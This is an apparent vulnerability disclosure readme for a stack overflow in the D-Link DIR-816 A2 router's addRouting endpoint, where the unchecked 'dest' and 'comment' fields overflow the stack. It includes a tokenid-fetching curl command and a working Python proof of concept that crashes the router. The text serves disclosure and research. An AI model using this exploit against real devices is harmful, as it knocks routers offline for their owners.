Skip to content

Latest commit

 

History

History
66 lines (42 loc) · 1.74 KB

readme.md

File metadata and controls

66 lines (42 loc) · 1.74 KB

D-link DIR-816 A2_v1.10CNB04.img Stack overflow vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

As can be seen from the above figure, when the hostnet is net, dest will be copied to v14. It is worth noting that the size is not limited, which leads to stack overflow.

At the same time, there is another place below this function that can cause stack overflow. As shown in the figure above, the control v18 is the comment, and v18 will be added to v16. There is no size limit, which will lead to stack overflow.

Poc

We need to get the tokenid first

curl http://192.168.0.1/dir_login.asp | grep tokenid

接着构造以下poc即可

import requests

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

tokenid = 'xxx'

url = 'http://192.168.0.1/goform/addRouting'

data = {
    'tokenid' : tokenid,
    'dest' : 'a' * 10000, 
    'hostnet' : 'net',
    'netmask' : '255.255.255.0',
    'gateway' : '192.168.0.1',
    'interface' : 'LAN',
    'custom_interface' : 'br0',
    'comment' : 'a' * 10000

}
response = requests.post(url, data=data)
response.encoding="utf-8"
info = response.text
li(url)
print(info)

final router crash